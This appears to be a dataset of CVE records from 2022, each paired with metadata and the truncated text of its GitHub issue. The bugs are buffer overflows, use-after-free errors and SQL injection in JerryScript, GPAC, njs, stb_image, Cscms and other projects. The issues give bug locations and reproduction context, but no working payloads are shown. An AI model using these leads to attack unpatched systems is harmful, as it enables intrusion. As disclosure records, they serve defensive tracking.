Stack overflow vulnerability in Jerryscript before commit e1ce7dd7271288be8c0c8136eea9107df73a8ce2 on Oct 20, 2021 due to an unbounded recursive call to the new opt() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4779" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "DEA949B0-0B9B-44F8-8E13-0559CA6BB90E", "versionEndExcluding": "2021-10-20", "versionEndIncluding": null, "versio...
https://github.com/jerryscript-project/jerryscript/issues/4779
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision e1ce7dd7 ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.11.0-34-generic x86_64) Linux-5.11.0-34-generic-x86_64-with-glibc2.29 ###### Build steps ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer...
stack-overflow in jmem_heap_alloc_block_internal
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4779/comments
5
2021-09-23T13:13:53Z
2021-10-18T12:47:01Z
https://github.com/jerryscript-project/jerryscript/issues/4779
1,005,422,113
4,779
CVE-2021-43453
2022-04-07T21:15:07.517
A Heap-based Buffer Overflow vulnerability exists in JerryScript 2.4.0 and prior versions via an out-of-bounds read in parser_parse_for_statement_start in the js-parser-statm.c file. This issue is similar to CVE-2020-29657.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4754" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CA39B32-B4C8-4430-A138-4C35D325F832", "versionEndExcluding": null, "versionEndIncluding": "2.4.0", "versionStar...
https://github.com/jerryscript-project/jerryscript/issues/4754
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision ```sh $ jerry --version Version: 3.0.0 (5a69b183) ``` ###### Build platform ```sh $ echo "$(lsb_release -ds) ($(uname -mrs))" Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86_64) ``` ###### Build steps ```sh $ python tools/build.py ``` ###### Test case There are two ...
Heap-overflow on an ill-formed JS program
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4754/comments
1
2021-08-28T22:00:46Z
2021-11-02T07:36:17Z
https://github.com/jerryscript-project/jerryscript/issues/4754
981,936,669
4,754
CVE-2022-27044
2022-04-08T15:15:08.333
libsixel 1.8.6 is affected by Buffer Overflow in libsixel/src/quant.c:876.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/156" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "D78CB59C-7966-46E3-A325-A7508F0ED51D", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
https://github.com/saitoha/libsixel/issues/156
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
Hi,I found a heap-buffer-overflow in the current master [6a5be8b](https://github.com/saitoha/libsixel/commit/6a5be8b72d84037b83a5ea838e17bcf372ab1d5f) I build `img2sixel` with `ASAN`,this is ASAN report. OS: Ubuntu 20.04.3 LTS x86_64 Kernel: 5.11.0-27-generic POC: [poc.zip](https://github.com/saitoha/libsixel/f...
heap-buffer-overflow in libsixel/src/quant.c:876
https://api.github.com/repos/saitoha/libsixel/issues/156/comments
0
2021-09-01T11:17:40Z
2021-09-01T11:17:40Z
https://github.com/saitoha/libsixel/issues/156
985,027,447
156
CVE-2022-27046
2022-04-08T15:15:08.483
libsixel 1.8.6 suffers from a Heap Use After Free vulnerability in in libsixel/src/dither.c:388.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/157" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "D78CB59C-7966-46E3-A325-A7508F0ED51D", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
https://github.com/saitoha/libsixel/issues/157
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
Hi,I found a heap-use-after-free in the current master [6a5be8b](https://github.com/saitoha/libsixel/commit/6a5be8b72d84037b83a5ea838e17bcf372ab1d5f) I build img2sixel with ASAN,this is ASAN report. OS: Ubuntu 20.04.3 LTS x86_64 Kernel: 5.11.0-27-generic POC: [poc.zip](https://github.com/saitoha/libsixel/files/...
heap-use-after-free in libsixel/src/dither.c:388
https://api.github.com/repos/saitoha/libsixel/issues/157/comments
0
2021-09-14T12:18:43Z
2021-09-18T04:17:56Z
https://github.com/saitoha/libsixel/issues/157
995,951,004
157
CVE-2022-27145
2022-04-08T16:15:08.327
GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a stack-overflow vulnerability in function gf_isom_get_sample_for_movie_time of mp4box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2108" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": n...
https://github.com/gpac/gpac/issues/2108
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There is a statck-overflow detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1727-g8be34973d-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`...
There is a statck-overflow detected by AddressSanitizer
https://api.github.com/repos/gpac/gpac/issues/2108/comments
0
2022-02-08T04:22:07Z
2022-02-08T15:23:20Z
https://github.com/gpac/gpac/issues/2108
1,126,776,763
2,108
CVE-2022-27146
2022-04-08T16:15:08.367
GPAC mp4box 1.1.0-DEV-rev1759-geb2d1e6dd-has a heap-buffer-overflow vulnerability in function gf_isom_apple_enum_tag.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": n...
https://github.com/gpac/gpac/issues/2120
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There is a heap buffer overflow detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1759-geb2d1e6dd-master ``` ## Build command ``` ./configure --static-mp4box --pre...
There is a heap buffer overflow detected by AddressSanitizer
https://api.github.com/repos/gpac/gpac/issues/2120/comments
0
2022-02-16T11:57:40Z
2022-02-16T17:15:45Z
https://github.com/gpac/gpac/issues/2120
1,139,917,650
2,120
CVE-2022-27147
2022-04-08T16:15:08.407
GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a use-after-free vulnerability in function gf_node_get_attribute_by_tag.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2109" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": n...
https://github.com/gpac/gpac/issues/2109
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There is a use-after-free detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1727-g8be34973d-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`r...
There is a use-after-free detected by AddressSanitizer
https://api.github.com/repos/gpac/gpac/issues/2109/comments
0
2022-02-08T04:23:02Z
2022-02-08T15:23:20Z
https://github.com/gpac/gpac/issues/2109
1,126,777,303
2,109
CVE-2022-27148
2022-04-08T16:15:08.450
GPAC mp4box 1.1.0-DEV-rev1663-g881c6a94a-master is vulnerable to Integer Overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2067" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": n...
https://github.com/gpac/gpac/issues/2067
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There are some signed-integer-overflow caused runtime error and are detected by UndefinedBehaviorSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1663-g881c6a94a-master ``` ## Build c...
Signed integer overflow
https://api.github.com/repos/gpac/gpac/issues/2067/comments
1
2022-01-26T05:27:46Z
2022-01-27T10:41:15Z
https://github.com/gpac/gpac/issues/2067
1,114,645,297
2,067
CVE-2022-27156
2022-04-11T15:15:09.223
Daylight Studio Fuel CMS 1.5.1 is vulnerable to HTML Injection.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/593" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "F3A806A2-582F-49B6-B9EC-C0FB4B13ED3D", "versionEndExcluding": null, "versionEndIncluding": null, "version...
https://github.com/daylightstudio/FUEL-CMS/issues/593
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
A HTML Injection issue is affecting the application. STEP 1: ![image](https://user-images.githubusercontent.com/97121933/158069702-a53ac07c-433d-4303-bd4f-2b64d0c479a4.png) STEP 2: ![image](https://user-images.githubusercontent.com/97121933/158069639-b3af4292-e84b-4b1e-8fcd-e0fa7c6626eb.png)
HTML Injection Issue
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/593/comments
2
2022-03-13T16:39:35Z
2022-07-30T22:42:59Z
https://github.com/daylightstudio/FUEL-CMS/issues/593
1,167,630,562
593
CVE-2022-27416
2022-04-12T20:15:08.957
Tcpreplay v4.4.1 was discovered to contain a double-free via __interceptor_free.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIA...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/702" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://securi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/702
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tc...
[Bug] Double-free
https://api.github.com/repos/appneta/tcpreplay/issues/702/comments
2
2022-02-05T08:53:25Z
2022-02-11T21:36:05Z
https://github.com/appneta/tcpreplay/issues/702
1,124,875,048
702
CVE-2022-27418
2022-04-12T20:15:08.997
Tcpreplay v4.4.1 has a heap-based buffer overflow in do_checksum_math at /tcpedit/checksum.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIA...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/703" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://securi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/703
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tc...
Heap-buffer-overflow in tcpreplay
https://api.github.com/repos/appneta/tcpreplay/issues/703/comments
1
2022-02-05T10:45:27Z
2022-02-12T17:56:43Z
https://github.com/appneta/tcpreplay/issues/703
1,124,896,906
703
CVE-2022-27007
2022-04-14T15:15:08.163
nginx njs 0.7.2 is affected suffers from Use-after-free in njs_function_frame_alloc() when it try to invoke from a restored frame saved with njs_function_frame_save().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/ad48705bf1f04b4221a5f5b07715ac48b3160d53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "C1858598-78C6-451F-81B4-57F6D636EBAC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nul...
https://github.com/nginx/njs/issues/469
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
This UAF was introduced in a patch for a similar bug #451, which shows that njs_await_fulfilled is still flawed. ### Environment ``` OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 7bd570b39297d3d91902c93a624c89b08be7a6fe Version...
Patch bypass for njs_await_fulfilled, causing UAF again
https://api.github.com/repos/nginx/njs/issues/469/comments
3
2022-02-15T08:42:02Z
2022-02-21T18:58:48Z
https://github.com/nginx/njs/issues/469
1,138,362,403
469
CVE-2022-27008
2022-04-14T15:15:08.207
nginx njs 0.7.2 is vulnerable to Buffer Overflow. Type confused in Array.prototype.concat() when a slow array appended element is fast array.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/e673ae41a998d1391bd562edb2ed6d49db7cc716" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "C1858598-78C6-451F-81B4-57F6D636EBAC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nul...
https://github.com/nginx/njs/issues/471
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
### Environment ``` OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 7bd570b39297d3d91902c93a624c89b08be7a6fe Version : 0.7.2 Build : NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address" NJS_CFLAGS="$NJS_CFLAGS -...
SEGV njs_array.c:335:41 in njs_array_add
https://api.github.com/repos/nginx/njs/issues/471/comments
0
2022-02-15T09:26:33Z
2022-02-21T16:55:07Z
https://github.com/nginx/njs/issues/471
1,138,411,189
471
CVE-2022-28041
2022-04-15T14:15:07.570
stb_image.h v2.27 was discovered to contain an integer overflow via the function stbi__jpeg_decode_block_prog_dc. This vulnerability allows attackers to cause a Denial of Service (DoS) via unspecified vectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1292" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*", "matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
https://github.com/nothings/stb/issues/1292
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe the bug** `UBSAN: runtime error: signed integer overflow: -126340289 * 17 cannot be represented in type 'int'` and `UBSAN: runtime error: signed integer overflow: -2147450975 + -32767 cannot be represented in type 'int'` **To Reproduce** Built stb according to [the oss-fuzz script](https://github.com/...
UBSAN: integer overflow
https://api.github.com/repos/nothings/stb/issues/1292/comments
2
2022-02-17T15:52:07Z
2023-01-29T23:47:29Z
https://github.com/nothings/stb/issues/1292
1,141,520,739
1,292
CVE-2022-28042
2022-04-15T14:15:07.617
stb_image.h v2.27 was discovered to contain an heap-based use-after-free via the function stbi__jpeg_huff_decode.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1289" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*", "matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
https://github.com/nothings/stb/issues/1289
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe the bug** UndefinedBehaviorSanitizer: undefined-behavior: index out of bounds + AddressSanitizer: heap-use-after-free in stbi__jpeg_huff_decode. **To Reproduce** Built stb according to [the oss-fuzz script](https://github.com/nothings/stb/blob/master/tests/ossfuzz.sh) with `CXXFLAGS='-O1 -fsanitize=addr...
AddressSanitizer: heap-use-after-free in stbi__jpeg_huff_decode
https://api.github.com/repos/nothings/stb/issues/1289/comments
3
2022-02-17T11:13:28Z
2023-01-29T23:47:59Z
https://github.com/nothings/stb/issues/1289
1,141,200,788
1,289
CVE-2022-28048
2022-04-15T14:15:07.703
STB v2.27 was discovered to contain an integer shift of invalid size in the component stbi__jpeg_decode_block_prog_ac.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1293" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "u...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stb_project:stb:2.27:*:*:*:*:*:*:*", "matchCriteriaId": "4EE9CD8E-67B3-4D15-A7D3-FD54FEE21B79", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/nothings/stb/issues/1293
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Describe the bug** Several `UBSAN runtime error: shift exponent 32 is too large for 32-bit type 'unsigned int'` and similar **To Reproduce** Built stb according to [the oss-fuzz script](https://github.com/nothings/stb/blob/master/tests/ossfuzz.sh) with `CXXFLAGS='-O1 -fsanitize=address -fsanitize=array-bounds,bo...
UBSAN: shift exponent is too large
https://api.github.com/repos/nothings/stb/issues/1293/comments
4
2022-02-17T15:56:39Z
2023-06-30T00:36:04Z
https://github.com/nothings/stb/issues/1293
1,141,526,489
1,293
CVE-2022-28049
2022-04-15T14:15:07.747
NGINX NJS 0.7.2 was discovered to contain a NULL pointer dereference via the component njs_vmcode_array at /src/njs_vmcode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/f65981b0b8fcf02d69a40bc934803c25c9f607ab" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "C1858598-78C6-451F-81B4-57F6D636EBAC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nul...
https://github.com/nginx/njs/issues/473
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Hi, this bug was found by fuzzing the current master branch, to reproduce build the OSS-Fuzz harness with ASan and UBSan. The bug is a write to a NULL pointer, this is the sanitizer report: ``` INFO: Seed: 2125423890 INFO: Loaded 1 modules (53334 inline 8-bit counters): 53334 [0x95f010, 0x96c066), INFO: Lo...
Null pointer dereference in src/njs_vmcode.c:1049:17
https://api.github.com/repos/nginx/njs/issues/473/comments
0
2022-02-17T15:51:14Z
2022-02-21T16:55:08Z
https://github.com/nginx/njs/issues/473
1,141,519,666
473
CVE-2022-27365
2022-04-15T18:15:10.330
Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Dance.php_del.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/12#issue-1170440183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chshcms:cscms:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "1865339A-4927-439D-9D16-D38C8330CB92", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/chshcms/cscms/issues/12#issue-1170440183
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chshcms", "cscms" ]
##### SQL injection vulnerability exists in Cscms music portal system v4.2 There is a SQL blind injection vulnerability in dance_Dance.php_del #### Details Add a song after administrator login ![image](https://user-images.githubusercontent.com/96719328/158499410-c2be7972-449a-4534-b767-c01d6b108373.png) POC ``` ...
SQL injection vulnerability exists in Cscms music portal system v4.2
https://api.github.com/repos/chshcms/cscms/issues/12/comments
0
2022-03-16T01:45:29Z
2022-03-16T01:45:29Z
https://github.com/chshcms/cscms/issues/12
1,170,440,183
12
CVE-2022-27366
2022-04-15T18:15:10.383
Cscms Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the component dance_Dance.php_hy.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/13#issue-1170447891" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chshcms:cscms:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "1865339A-4927-439D-9D16-D38C8330CB92", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/chshcms/cscms/issues/13#issue-1170447891
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chshcms", "cscms" ]
#### There is a SQL blind injection vulnerability in dance_Dance.php_hy #### Details Add a song after administrator login ![image](https://user-images.githubusercontent.com/96719328/158500746-50c27c84-05ac-4d5b-b206-695c60f63e51.png) Add songs first and then delete them into the trash ![image](https://user-i...
SQL injection vulnerability exists in Cscms music portal system v4.2
https://api.github.com/repos/chshcms/cscms/issues/13/comments
0
2022-03-16T01:58:50Z
2022-03-16T01:58:50Z
https://github.com/chshcms/cscms/issues/13
1,170,447,891
13
